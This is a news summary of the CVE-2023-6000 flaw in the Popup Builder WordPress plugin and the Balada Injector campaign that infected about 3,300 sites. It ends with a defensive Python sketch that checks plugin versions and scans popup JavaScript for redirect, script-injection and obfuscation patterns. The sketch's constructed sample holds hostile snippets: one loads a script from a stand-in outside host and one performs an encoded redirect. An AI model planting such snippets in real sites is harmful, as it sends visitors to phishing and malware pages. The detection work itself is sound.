WordPress Plugin Vulnerability Leads To 3,300 Sites Infected With Malware

Original article from: Bleeping Computer

In a recent cybersecurity development, a significant number of WordPress websites have fallen victim to a widespread malware infection. The culprit is a vulnerability in an outdated version of the Popup Builder plugin, which has been exploited by hackers to compromise over 3,300 sites.

The security flaw, identified as CVE-2023-6000, affects Popup Builder versions 4.2.3 and below. It was initially disclosed in November 2023, but many site administrators failed to update promptly, leading to a large-scale Balada Injector campaign that infected thousands of websites.

Attackers have been injecting malicious code into the Custom JavaScript or CSS sections of the WordPress admin interface, specifically targeting event handlers related to the Popup Builder plugin. This code triggers upon certain actions, such as opening or closing a popup, and primarily aims to redirect visitors to harmful sites, including phishing pages and malware-dropping domains.

Preventive Measures and Remediation

Website owners are advised to upgrade to the latest version of the Popup Builder plugin, which patches the vulnerability and other security issues. Additionally, blocking the domains associated with the attack can help prevent further infections. For those already affected, thorough removal of the malicious entries and scanning for hidden backdoors are crucial steps to secure their sites.
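A triage sketch for the version check and the review of custom JavaScript entries described above, added here as an example and not taken from the original article or the plugin. The handler names, host names and snippet contents in SAMPLE are constructed, and the regex indicators are generic heuristics assumed for illustration, not the campaign's actual indicators.

```python
import re

# Per the article: Popup Builder 4.2.3 and below are affected by CVE-2023-6000.
AFFECTED_UP_TO = (4, 2, 3)

# Generic heuristics (assumptions, not campaign IoCs) for redirect/loader code.
INDICATORS = {
    "redirect": re.compile(
        r"\b(?:window\.|document\.|top\.)?location(?:\.href)?\s*=[^=]"
        r"|location\.(?:replace|assign)\s*\("),
    "script-injection": re.compile(r"createElement\s*\(\s*['\"]script['\"]", re.I),
    "obfuscation": re.compile(r"\b(?:eval|atob|unescape)\s*\(|String\.fromCharCode"),
}
URL_HOST = re.compile(r"(?:https?:)?//([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)

def in_affected_range(version: str) -> bool:
    """True if a dotted version string is <= 4.2.3 (missing parts count as 0)."""
    parts = [int(p) for p in re.findall(r"\d+", version)]
    parts += [0] * (3 - len(parts))
    return tuple(parts) <= AFFECTED_UP_TO

def scan_custom_js(snippets: dict, site_host: str) -> list:
    """Return (handler, indicator names, off-site hosts) for each suspicious snippet."""
    findings = []
    for handler, code in snippets.items():
        hits = [name for name, rx in INDICATORS.items() if rx.search(code)]
        hosts = {h.lower() for h in URL_HOST.findall(code)}
        external = sorted(h for h in hosts
                          if h != site_host and not h.endswith("." + site_host))
        if hits or external:
            findings.append((handler, hits, external))
    return findings

# Constructed sample: custom JS exported from a popup's event handlers.
SAMPLE = {
    "on_open": "console.log('popup opened');",
    "on_close": "var s=document.createElement('script');"
                "s.src='https://cdn.unknown-host.example/l.js';"
                "document.head.appendChild(s);",
    "will_open": "if(!seen){window.location.href=atob('Y29uc3RydWN0ZWQ=');}",
    "did_open": "fetch('https://shop.example/api/track');",
}

if __name__ == "__main__":
    print("in affected range:", in_affected_range("4.2.3"))
    for finding in scan_custom_js(SAMPLE, "shop.example"):
        print(finding)
```

A flagged handler is a prompt for manual review, not proof of compromise; legitimate popups can also load third-party scripts.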
